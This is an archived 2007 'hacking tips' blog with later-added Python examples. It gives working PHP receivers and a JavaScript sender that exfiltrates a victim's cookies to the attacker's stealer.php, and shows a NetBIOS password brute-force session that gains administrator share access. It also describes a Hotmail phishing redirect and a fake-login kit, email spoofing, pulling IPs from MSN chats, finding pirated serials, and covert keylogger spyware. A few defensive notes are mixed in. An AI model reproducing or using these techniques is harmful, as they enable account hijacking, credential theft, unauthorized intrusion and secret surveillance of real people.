Introduction
Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.
The sender can take many forms. In essence, it is just a link to the receiver with the victim's cookie attached. Finding a way to plant the sender is usually the hard part.
The receiver, as the name suggests, is whatever receives the cookie from the sender. It can also take several forms, but the most common is a PHP script sitting on some obscure web server.
Step One: The Code
Coding a receiver is the part most newcomers struggle with. Only two things are needed to make a receiver: a web host that supports PHP, and a text editor such as Notepad (see the end of the text for a link to some free PHP hosts).
As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP script is the HTTP GET method, which appends the information to the end of the URL as a query parameter (for example, "page.php?arg1=value"). PHP exposes GET parameters through the $_GET array as $_GET["x"], where x is the name of the parameter. (The original version of this text used $HTTP_GET_VARS; that long-deprecated name was removed in PHP 5.4, so the scripts below use $_GET.)
Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.
First, let's look at sending it in an email. Here is what such a beast looks like (functioning code; the opening <?php tag is line 1):
<?php // line 1
$cookie = $_GET["cookie"]; // line 2
mail("me@mydomain.com", "Cookie stealer report", $cookie); // line 3
?> // line 4
Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 calls PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject "Cookie stealer report". Note that mail() needs a working local mail transfer agent or an SMTP setting in php.ini; many free hosts disable it, which is one reason the log-file version below is more reliable.
Line 4 tells the server that the PHP code ends here.
Next, we'll look at my preferred method, which is storing the cookie in a log file (functioning code):
<?php // line 1
$cookie = $_GET["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5
Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for appending (mode 'a' creates the file if needed and adds to the end rather than overwriting it), then stores the file handle in $file. The web server's user account must be allowed to write to the script's directory.
Line 4 writes the cookie to the file whose handle is in $file. The period between $cookie and "\n\n" joins the two strings into one. The "\n\n" acts as a double line break, making it easier to sift through the log file.
Line 5 is the same as before.
Step Two: Implementing the Stealer
The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method uses HTML and JavaScript, so you have to be sure your environment supports both. Here is an example of a sender (the receiver's address is a placeholder; use the URL of your own stealer.php):
<script> // Line 1
document.location = "http://www.yoursite.com/stealer.php?cookie=" + document.cookie; // Line 2
</script> // Line 3
Line 1 tells the browser that the following chunk of code is to be interpreted as JavaScript.
Line 2 appends document.cookie to the end of the receiver's URL and stores the result in document.location. Whenever document.location is changed, the browser is redirected to that URL, so the victim's cookies arrive at the receiver as the "cookie" parameter. Two caveats: document.cookie only contains the cookies of the site the script runs on, and cookies set with the HttpOnly attribute are not exposed through document.cookie at all, so they never reach the receiver.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).
There are two main ways of implementing the sender:
You can plant your sender where the victim will view it as an HTML document in their browser. In order to do that, you have to find some way to actually post the code somewhere on the site.
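The following Python is an added example, not code from the original post: it does on the receiving side what the PHP scripts above do, and then shows the server-side setting that defeats the sender. parse_stolen_cookie() URL-decodes the ?cookie= value and splits document.cookie's "a=1; b=2" format into pairs (the form a defender uses when triaging such a log), log_entry() records who sent it and when, and is_readable_by_script() checks a Set-Cookie header for the HttpOnly attribute, which keeps a cookie out of document.cookie. The host name, cookie names and client address are made up for the example.

```python
"""Added example (not from the original post): what a cookie-stealer
receiver ends up with, and which cookies never reach it.

Assumptions: the receiver URL, cookie names and client IP below are
invented; no real service is involved.
"""
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit


def parse_stolen_cookie(request_url):
    """Return {name: value} for the cookie string the sender appended.

    request_url is what the receiver sees, e.g.
    "http://www.yoursite.com/stealer.php?cookie=PHPSESSID%3Dabc%3B%20user%3Dbob"
    """
    query = urlsplit(request_url).query
    raw = parse_qs(query).get("cookie", [""])[0]   # parse_qs URL-decodes
    cookies = {}
    for pair in raw.split(";"):                     # document.cookie separator
        name, sep, value = pair.strip().partition("=")
        if name and sep:                            # skip empty fragments
            cookies[name] = value
    return cookies


def log_entry(request_url, client_ip, now=None):
    """One line in the spirit of cookielog.txt, plus sender address and time."""
    now = now or datetime.now(timezone.utc)
    cookies = parse_stolen_cookie(request_url)
    rendered = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return f"{now.isoformat()} {client_ip} {rendered}"


def is_readable_by_script(set_cookie_header):
    """True if document.cookie would expose this cookie to the sender.

    Attribute names in Set-Cookie are case-insensitive. Only HttpOnly hides
    the cookie from JavaScript; Secure and SameSite limit where the browser
    sends it, not whether script can read it.
    """
    attrs = [a.strip().split("=", 1)[0].lower()
             for a in set_cookie_header.split(";")[1:]]
    return "httponly" not in attrs


if __name__ == "__main__":
    # constructed hit on the receiver, as the browser would encode it
    hit = "http://www.yoursite.com/stealer.php?cookie=PHPSESSID%3Dabc123%3B%20user%3Dbob"
    print(log_entry(hit, "203.0.113.5"))
    print(is_readable_by_script("PHPSESSID=abc123; Path=/"))              # True
    print(is_readable_by_script("PHPSESSID=abc123; Path=/; HttpOnly; Secure"))  # False
```

The practical consequence: a session cookie issued with HttpOnly is invisible to the sender above no matter where the script is planted, which is why that attribute belongs on every cookie that does not genuinely need to be read by page script.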
Posted by Venkatesh Vedhakumar at Sunday, August 12, 2007
Labels: Hacking tips, Orkut
NetBIOS Hacking
This is for educational purposes only. All viewers please keep in mind that the information here is given for informational purposes only, so please do not misuse your knowledge.
NetBIOS Attack Methods
This NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, and Windows 98 beta 2.1. One of the components used is NAT.EXE. A discussion of the tool, its switches, and common techniques follows:
NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>
Switches:
-o Specify the output file. All results from the scan will be written to the specified file, in addition to standard output.
-u Specify the file to read usernames from. Usernames will be read from the specified file when attempting to guess the password on the remote server. Usernames should appear one per line in the specified file.
-p Specify the file to read passwords from. Passwords will be read from the specified file when attempting to guess the password on the remote server. Passwords should appear one per line in the specified file.
Addresses should be specified in comma-delimited format, with no spaces. Valid address specifications include:
hostname - "hostname" is added
127.0.0.1-127.0.0.3, adds addresses 127.0.0.1 through 127.0.0.3
127.0.0.1-3, adds addresses 127.0.0.1 through 127.0.0.3
127.0.0.1-3,7,10-20, adds addresses 127.0.0.1 through 127.0.0.3, 127.0.0.7, and 127.0.0.10 through 127.0.0.20
hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1 through 127.0.0.3
All combinations of hostnames and address ranges as specified above are valid.
[8.0.1] Comparing NAT.EXE to Microsoft's own executables
[8.0.2] First, a look at NBTSTAT
First we look at the NBTSTAT command. This command was discussed in earlier portions of the book ([5.0.6] The Nbtstat Command). In this section, you will see a demonstration of how this tool is used and how it compares to other Microsoft tools and non-Microsoft tools.
What follows is pretty much a step-by-step guide to using NBTSTAT, as well as extra information. Again, if you're interested in more NBTSTAT switches and functions, view the [5.0.6] The Nbtstat Command portion of the book.
C:\nbtstat -A XXX.XX.XXX.XX
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-C0-4F-C4-8C-9D
Here is a partial listing of NetBIOS name suffixes (the 16th byte of the name):
Computername <00> UNIQUE  Workstation service name
Domainname   <00> GROUP   Domain name
Server       <20> UNIQUE  Server service name
Computername <03> UNIQUE  Registered by the messenger service. This is the computer name to add to the LMHOSTS file, which is not necessary in order to use NAT.EXE but is necessary if you would like to view the remote computer in Network Neighborhood.
Username     <03>         Registered by the messenger service for the logged-on user.
Domainname   <1B> UNIQUE  Registers the local computer as the master browser for the domain
Domainname   <1C> GROUP   Registers the computer as a domain controller for the domain (PDC or BDC)
Domainname   <1D> UNIQUE  Registers the local client as the local segment's master browser for the domain
Domainname   <1E> GROUP   Registers as a group NetBIOS name
Network Monitor Name
Network Monitor Agent
             <06>         RAS Server
             <1F>         Net DDE
             <21>         RAS Client
Reading the table above with this list: STUDENT1 <20> says the server service (file shares) is running, DOMAIN1 <1C> says the host is a domain controller, and a <03> entry whose name differs from the computer name would be the logged-on user, which is the first name worth putting in userlist.txt.
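As an added example (not from the original text), the following Python parses the "nbtstat -A" table shown above and turns it into the facts an attacker acts on. The sample table is copied from the page; the suffix meanings come from the partial listing above, with one addition labelled in the code. The inference worth automating is the <03> rule: every host registers its own computer name with <03>, so a <03> name that differs from the computer name is a logged-on user.

```python
"""Added example: parse an nbtstat -A name table and summarize it.
SAMPLE is the table from the page; the JSMITH row used in testing is invented.
"""
import re

SAMPLE = """\
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-C0-4F-C4-8C-9D
"""

# name, then <suffix>, then UNIQUE/GROUP, then the status word
_ROW = re.compile(r"^(\S.*?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)")

SUFFIX = {  # (suffix, type) -> meaning, as listed on the page
    ("00", "UNIQUE"): "workstation service",
    ("00", "GROUP"): "domain/workgroup name",
    ("03", "UNIQUE"): "messenger service (computer name or logged-on user)",
    ("20", "UNIQUE"): "server service (file shares)",
    ("1B", "UNIQUE"): "domain master browser",
    ("1C", "GROUP"): "domain controller",
    ("1D", "UNIQUE"): "segment master browser",
    ("1E", "GROUP"): "group NetBIOS name (browser elections)",
    ("06", "UNIQUE"): "RAS server",
    ("1F", "UNIQUE"): "Net DDE",
    ("21", "UNIQUE"): "RAS client",
    # not in the page's list: the __MSBROWSE__ group name announces the master browser
    ("01", "GROUP"): "master browser announcement (__MSBROWSE__)",
}


def parse_name_table(text):
    """Return a list of (name, suffix, type, status) tuples."""
    rows = []
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            rows.append((m.group(1), m.group(2).upper(), m.group(3), m.group(4)))
    return rows


def summarize(rows):
    """Reduce the raw table to computer, domain, users and role flags."""
    facts = {"computer": None, "domain": None, "users": [],
             "file_server": False, "domain_controller": False}
    for name, suffix, ntype, _status in rows:
        if suffix == "00" and ntype == "UNIQUE":
            facts["computer"] = name
        elif suffix == "00" and ntype == "GROUP":
            facts["domain"] = name
        elif suffix == "20":
            facts["file_server"] = True
        elif suffix == "1C":
            facts["domain_controller"] = True
    # second pass: a <03> unique name that is not the computer is a user name
    for name, suffix, ntype, _status in rows:
        if suffix == "03" and ntype == "UNIQUE" and name != facts["computer"]:
            facts["users"].append(name)
    return facts


def describe(rows):
    """One human-readable line per row, using the suffix meanings above."""
    return [f"{name:<16} <{suffix}> {SUFFIX.get((suffix, ntype), 'unknown')}"
            for name, suffix, ntype, _status in rows]


if __name__ == "__main__":
    rows = parse_name_table(SAMPLE)
    print("\n".join(describe(rows)))
    print(summarize(rows))
```

On the page's own table the summary is computer STUDENT1, domain DOMAIN1, file server and domain controller both true, and no user name leaked, because the only <03> entry is the computer's own.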
[8.0.3] Intro to the NET commands
The NET command is a command that admins can execute from a command window to show information about servers, networks, shares, and connections. It also has a number of options you can use to add user accounts and groups, change domain settings, and configure shares. In this section, you will learn about these NET commands, and you will also get the outline of a NET command batch file that can be used as a primitive network security analysis tool. Before we continue with the techniques, a discussion of the available options comes first:
[8.0.4] Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirements.
[8.0.5] Net Computer: This adds or deletes computers from a domains database.
[8.0.6] Net Config Server or Net Config Workstation: Displays config info about the server service. When used without specifying Server or Workstation, the command displays a list of configurable services.
[8.0.7] Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command.
[8.0.8] Net File: This command lists the open files on a server and has options for closing shared files and removing file locks.
[8.0.9] Net Group: This displays information about group names and has options you can use to add or modify global groups on servers.
[8.1.0] Net Help: Help with these commands
[8.1.1] Net Helpmsg message#: Get help with a particular net error or function message.
[8.1.2] Net Localgroup: Use this to list local groups on servers. You can also modify those groups.
[8.1.3] Net Name: This command shows the names of computers and users to which messages are sent on the computer.
[8.1.4] Net Pause: Use this command to suspend a certain NT service.
[8.1.5] Net Print: Displays print jobs and shared queues.
[8.1.6] Net Send: Use this command to send messages to other users, computers, or messaging names on the network.
[8.1.7] Net Session: Shows information about current sessions. Also has commands for disconnecting certain sessions.
[8.1.8] Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares.
[8.1.9] Net Statistics Server or Workstation: Shows the statistics log.
[8.2.0] Net Stop: Stops NT services, cancelling any connections the service is using. Note that stopping one service may stop other services that depend on it.
[8.2.1] Net Time: This command is used to display or set the time for a computer or domain.
[8.2.2] Net Use: This displays a list of connected computers and has options for connecting to and disconnecting from shared resources.
[8.2.3] Net User: This command will display a list of user accounts for the computer, and has options for creating and modifying those accounts.
[8.2.4] Net View: This command displays a list of resources being shared on a computer, including NetWare servers.
[8.2.5] Special note on DOS and older Windows machines: The commands listed above are available on Windows NT Server and Workstation; DOS and older Windows clients have these NET commands available:
Net Config
Net Diag (runs the diagnostic program)
Net Help
Net Init (loads protocol and network adapter drivers.)
Net Logoff
Net Logon
Net Password (changes password)
Net Print
Net Start
Net Stop
Net Time
Net Use
Net Ver (displays the type and version of the network redirector)
Net View
For this section, the commands being used are NET VIEW and NET USE.
[8.2.6] Actual NET VIEW and NET USE Screen Captures during a hack.
C:\net view XXX.XX.XXX.XX
Shared resources at XXX.XX.XXX.XX
Share name Type Used as Comment
------------------------------------------------------------------------------
NETLOGON Disk Logon server share
Test Disk
The command completed successfully.
NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown.
C:\net use /?
The syntax of this command is:
NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE [devicename | *] [password | *]] [/HOME]
NET USE [/PERSISTENT:{YES | NO}]
C:\net use x: \\XXX.XX.XXX.XX\test
The command completed successfully.
C:\unzipped\nat10bin>net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK X: \\XXX.XX.XXX.XX\test Microsoft Windows Network
OK \\XXX.XX.XXX.XX\test Microsoft Windows Network
The command completed successfully.
Here is an actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, us.
C:\nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY
[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: XXX.XX.XXX.XX
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:
Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
[*]--- Obtained listing of shares:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share
Test Disk:
[*]--- This machine has a browse list:
Server Comment
--------- -------
STUDENT1
[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access
If the default share permission of Everyone/Full Control is still in place, then you are done: the server is hacked. If not, keep playing. You will be surprised what you find out.
Source: taksaalisingh
Posted by Venkatesh Vedhakumar at Sunday, August 12, 2007
Labels: Hacking tips
Hacking Hotmail / MSN
Hacking Hotmail
Introduction
We all use Hotmail; it is one of my favorites.
Here I am going to reveal, and warn about, how unethical hackers can cheat us.
This page is meant for educational purposes only. I do not endorse hacking at all; it is meant for knowing the threats, protecting yourself, and curbing them.
Topics
1:- How Hotmail can be hacked with a fake login screen (2 different ways)
2:- Fake e-mail threats
3:- Detect a fake message in Hotmail
4:- How to get a person's IP address through MSN Messenger
5:- Curbing the way hackers get the passwords
6:- Easiest way
7:- Change the MSN Messenger title
8:- Protect yourself from viruses
9:- Hoax Toolbox v1.1
1) Protect yourself from phishing
Usually the unethical hackers upload a fake Hotmail login screen to a web server and then send this code to the victim from Yahoo or another mail program:
<script>
location.href="http://www.yoursite.com/yourhotmailfakepage.html"
</script>
The user is automatically redirected from their mailbox to the fake Hotmail screen, and if they log in there, they are hacked. (Webmail services now strip script from incoming HTML mail, so today the same trick is usually done with a plain link to the fake page.)
Beware of these threats.
2) Beware of fake login screens
They start chatting with the victim and send them a fake login screen through Messenger, trying to phish them. There are many of these available on the net; they are usually small Visual Basic programs. Never enter your password anywhere other than the latest version of MSN Messenger itself.
3) Fake e-mail threats
This is very easy: go to http://www.boxfrog.com/ and register (it is blocked now, but there are many others; Google will find them), click on "create message", type anyone's e-mail address in the From field, and the message will be sent with that sender.
There is also a simple way of doing this by telnetting to a mail server from the DOS prompt and typing the SMTP commands yourself.
Beware of this threat; make your spam protection strong.
4) Detect a fake message in your Hotmail inbox
This is simple. Open your mailbox, go to Options, select the message display settings (or something similar), and choose "full" where it lets you pick how much of the message header to show. Now open the mail you think is fake: at the bottom of the headers, where it says "from", you can see the address of the site the mail was sent from, and if someone sent it through some sort of program it will show their IP. Once you know the IP, I am sure you know how to proceed from there.
IMPORTANT: Read the Received: chain backwards, from the bottom up. Each server prepends its own Received: line, so the last one is the first server that handled the message and the From: line itself is just whatever the sender typed.
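The following Python is an added example, not from the original post: it reads a message's headers and pulls the originating host out of the Received: chain in the "backwards" order described above. The sample headers are constructed for the example and the hosts and addresses in them are not real.

```python
"""Added example: trace a message to its first hop via Received: headers.
The SAMPLE message, its hosts and its addresses are invented.
"""
import email
import re

SAMPLE = """\
Received: from mx2.provider.example (mx2.provider.example [198.51.100.7])
\tby inbox.provider.example with ESMTP id 12345; Sun, 12 Aug 2007 10:15:00 +0000
Received: from relay.anonmailer.example (relay.anonmailer.example [192.0.2.44])
\tby mx2.provider.example with ESMTP; Sun, 12 Aug 2007 10:14:58 +0000
Received: from user-pc ([203.0.113.9])
\tby relay.anonmailer.example with HTTP; Sun, 12 Aug 2007 10:14:55 +0000
From: "Your Friend" <friend@hotmail.example>
To: victim@hotmail.example
Subject: hi

body
"""

# an IPv4 address in square brackets, as Received: lines write the peer address
_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def received_chain(raw_message):
    """Received: lines in delivery order: the first hop comes first.

    Mail servers prepend their line, so the file order is reversed here;
    folded continuation lines are joined back into one string.
    """
    msg = email.message_from_string(raw_message)
    hops = msg.get_all("Received") or []
    return [" ".join(h.split()) for h in reversed(hops)]


def originating_ip(raw_message):
    """Bracketed IP from the earliest Received: line, or None if absent."""
    chain = received_chain(raw_message)
    if not chain:
        return None
    m = _IP.search(chain[0])
    return m.group(1) if m else None


def claimed_sender(raw_message):
    """The From: header, i.e. what the sender chose to write, not who sent it."""
    return email.message_from_string(raw_message)["From"]


if __name__ == "__main__":
    print("claims to be from:", claimed_sender(SAMPLE))
    for hop in received_chain(SAMPLE):
        print("hop:", hop)
    print("handed in from:", originating_ip(SAMPLE))
```

One caveat when using this for real: a sender can forge Received: lines underneath the genuine ones, so only the lines added by servers you trust (your own provider's, at the top) are reliable; the chain narrows the origin down to the last trustworthy hop, not necessarily to the sender's own machine.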
5) Protect yourself from revealing your IP address through MSN Messenger
Open Messenger and start chatting with a friend. Open MS-DOS, type netstat -n but do not press Enter yet, and minimize it. Now send something to your contact; as soon as they accept it, Messenger says "connecting". This is the moment to maximize the MS-DOS window and press Enter: the IP address next to the TIME_WAIT entry will be your friend's IP. You may be hacked the same way.
Beware!!
HoaX Toolbox v1.1
This is a PHP script that sets up a website with an admin area from which the user chooses between fake login pages for MSN Messenger, Hotmail, Yahoo and Google Mail. Once the script is installed on a server that has PHP and SQL, you log in to the administration page and choose which fake login page the main site should display. When the victim tries to log in to their mail or messenger, the website keeps the username and password in a log file that you can view at any time from the admin area. If the victim is careful enough to read your server's URL instead of hotmail.com or yahoo.com in the address bar and does not enter their real login, remember that you can pop up the main page of the site in a browser window with the address bar disabled, so that when the user clicks the "Yahoo Mail" link on your real site, a window without an address bar opens. If you don't know how to pop up customized browser windows, search Google.
Hacking MSN
Small yet working trick
Hacking MSN is actually very simple. MSN is designed to route the connection through a Microsoft server while you are chatting. However, when a file is sent, a direct connection (DCC) is created; this was done on purpose, because otherwise Microsoft would waste a lot of bandwidth. This is your chance. Start a file transfer between you and the victim (try to send a big file), open a command prompt (run "cmd" on NT/XP or "command" on 9x) and run netstat. Usually the MSN target's IP will be on a port above 2000. Enjoy.
If you receive something like gux1-43.primus.com as the target, that is the reverse-resolved name; run netstat -n to skip name resolution and get the bare address (or look the name up). This happens rarely; mostly you will receive a plain IP.
Once you have the IP you can fingerprint the host and go from there.
You can protect yourself from this by using a proxy with MSN (under the Connections panel in Options).
Source: taksaalisingh
Posted by Venkatesh Vedhakumar at Sunday, August 12, 2007
Labels: Hacking tips, Uploads and Emails Related
Rapidshare Downloader
CMS Grabber is the best tool I ever found on the internet; it stunned me when I started using it. Many Rapidshare users are still searching for a free premium account; this tool makes that unnecessary. Using it we can download files from Rapidshare without download limitations, multiple files at once, which is more than a Rapidshare premium account offers. Let's look at it briefly.
THE ONLY LEGAL PROGRAM FOR DOWNLOADS FROM RAPIDSHARE !!!
Bypasses download limitations. Download multiple files at once. Download even more than with premium!
This release is sponsored by StackFile Corp.
What's new
- fixed rapidshare.com grabber
- fixed rapidshare.com link checker
- added Huawei tool for renewing the IP address for ADSL users (supported hardware: SmartAX MT882 ADSL router/modem). Currently we support only USB mode; the next version will allow specifying the router address (it is now set to 192.168.1.2; you can configure your router to that address anyway so it will work in "Network Mode", i.e. when connected to the LAN NIC).
This release is sponsored by StackFile Corp and coded by SpongeBob.
NOTE: This program is not Vista compatible, but works fine with UAC disabled (User Account Control, a very useful and innovative thing which renders your computer useless and annoying to use).
Download from here
Homepage: CMSzone
The Home of grabber
Posted by Venkatesh Vedhakumar at Sunday, August 12, 2007
Labels: Hacking tips, Hacking Tools, Internet Related, Rapidshare / Megaupload, Software
Friday, August 10, 2007
Use Google to get Serial No of any Software
Most people download a trial version and use it; only after the trial expires do they look for a crack, serial number, keygen or patch.
But many don't know where to get a serial number, and some websites will infect your system with Trojan horses, viruses, adware or spyware.
So for beginners this is a simple way to find one with less effort, and it saves time too. But make sure you have an antivirus active before trying to get serials or patches, to avoid data loss.
Just follow the steps below:
1) Go to http://www.google.com
2) Type this syntax in the search bar: "Product name 94FBR"
3) Replace "Product name" with the desired software, leave a space, then type 94FBR
4) Press Enter; that's it.
Now you receive many pages which contain serial numbers, cracks, patches...
Just give it a try; this simple trick works for many people.
Posted by Venkatesh Vedhakumar at Friday, August 10, 2007
Labels: Google, Hacking tips
Thursday, August 2, 2007
Hack passwords in Firefox
Whenever you log in to a website with your username and password, Firefox asks whether you'd like it to remember this password.
If you click Remember, the next time you visit the website it will fill in the username and password for your convenience.
Now, back to the topic. Let's say you saved your GMail password in Firefox. Months or years go by and you no longer remember the password you set for your GMail. You start to panic and desperately need to get your GMail password back.
Don't worry; here's how you can find the hidden GMail password in Firefox.
Firefox is much better than Internet Explorer at managing "remembered" logins. Internet Explorer has no built-in feature for managing or viewing saved login information, which is why you need third-party tools to reveal the passwords hidden under asterisks. In Firefox, you can see remembered passwords with a few clicks.
To view your remembered passwords in Firefox, go to Tools and click Options. Go to the Security tab and click the Show Passwords button. The saved-passwords dialog appears; click Show Passwords again and a new column with the passwords appears. Keep in mind that anyone who can sit at your unlocked machine or copy your profile folder can do exactly the same, which is what the Master Password setting on that tab is for. (source)
Posted by Venkatesh Vedhakumar at Thursday, August 02, 2007
Labels: Firefox, Hacking tips
Monday, July 16, 2007
Language of Hackers
Hacker Language
Language helps reinforce the barrier between computer hackers and non-hackers, as well as that between hackers and crackers. Computer hackers have developed their own language. Firstly there is vocabulary that non-hackers will not know (TCP, IP, winsock, Linux, root access, vi, etc.) due to a lack of computer-related knowledge. Secondly, some computer hackers have modified English with a set of conventions. Hackers replace 'f' with 'ph' (likely coming from phreaks, who were interested in 'ph'ones), and 's' with 'z'. Hackers also use numbers in place of letters, such as '1' for 'i' or 'l' (though replacing 'i' is not the proper usage), '3' for 'E', '4' for 'a', and '7' for 't'. It is also important to use random caPitAlizaTioN, abbreviation and slang, to emphasize words by putting 'k-' before them ("k-rad"), and to finish a statement with a series of characters for emphasis.
Take this example from an Internet Relay Chat message in a hacking group (#hack):
c4n sUm1 h31p m3 w1tH h4x0RiNg mY sk00lz c0mPz?!?!?!!?!?
Which translates to: " can someone help me with hacking my school’s computers?"
Posted by Venkatesh Vedhakumar at Monday, July 16, 2007
Labels: Google, Hacking tips
Monday, July 9, 2007
Ways to change Users password
How to Bypass a Windows XP Password Without any Programs
Another way to change user passwords
Posted by Venkatesh Vedhakumar at Monday, July 09, 2007
Labels: Hacking tips
Ways to Bypass Spector pro
Spector Pro Removal Instructions
Spector General Description:
Spector Pro is spyware with specialized keylogging functions. Spector Pro contains seven integrated tools that record your chatroom conversations, your instant messages, your emails sent and received, web sites visited, your keystrokes typed, programs launched, and peer-to-peer file searching and swapping. Spector Pro also provides the equivalent of a digital surveillance tape so that the exact sequence of everything you do on the computer may be viewed. All seven tools work together at the same time, secretly saving all the recordings in a hidden location for the anonymous user.
More details about this software
This manual removal process is difficult and you run the risk of destroying your computer. We recommend that you use SpyHunter's Spyware Scanner.
Remove Spector processes:
webebot.exe
winnetcl.exe
Unregister Spector DLL files:
netknl.dll
netknlhm.dll
Detect and Delete these Spector files:
webebot.exe
winnetcl.exe
netknl.dll
netknlhm.dll
_msfilea.txt
599ca53a.tmp
winnetcl.cnt
winnetcl.hlp
Our Recommendation:
To avoid the unnecessary risk of damaging your computer, we highly recommend you use a good spyware cleaner/remover to track Spector and automatically find and remove other spyware, adware, trojans, and viruses in your PC.
Spector Automatic Detection:
Download Spector Remover
Download SpyHunter's free Spector scanner.
Posted by Venkatesh Vedhakumar at Monday, July 09, 2007
Labels: Hacking tips
Automatically Record everthing typed on PC and Net
The ONLY Keystroke Logger that Secretly Records Web Sites, Instant Messages, PASSWORDS, and MUCH More!
Spector Pro is the keystroke logger that will record ANY keystroke typed, chat and instant messages, web sites visited, emails, P2P activity, programs launched, online searches, MySpace activity, and visual snapshot recording. PLUS a detailed overview of everything they do the most!
Spector Pro is the BEST Keystroke Logger available anywhere - PERIOD!
Additionally, Spector Pro will examine and analyze the recordings and determine if you should be NOTIFIED IMMEDIATELY.
When it comes to having the most comprehensive keystroke logger, Spector Pro is EXACTLY what you need.
Spector Pro is the world’s best selling software for monitoring and recording every detail of PC and Internet activity – in your home or in your office. Selected as the Editors’ Choice by the experts at PC Magazine, Spector Pro records every detail of what they do on the computer – their chats, instant messages, emails, the web sites they visit, what they search for, what they do on MySpace, the pictures they post and look at, the keystrokes they type, the programs they run and much more. And because of its advanced surveillance screen snapshot features, you get to see not only WHAT they do, but the EXACT order in which they do it, step by step. With Spector Pro, you will never doubt who is doing what on the computer.
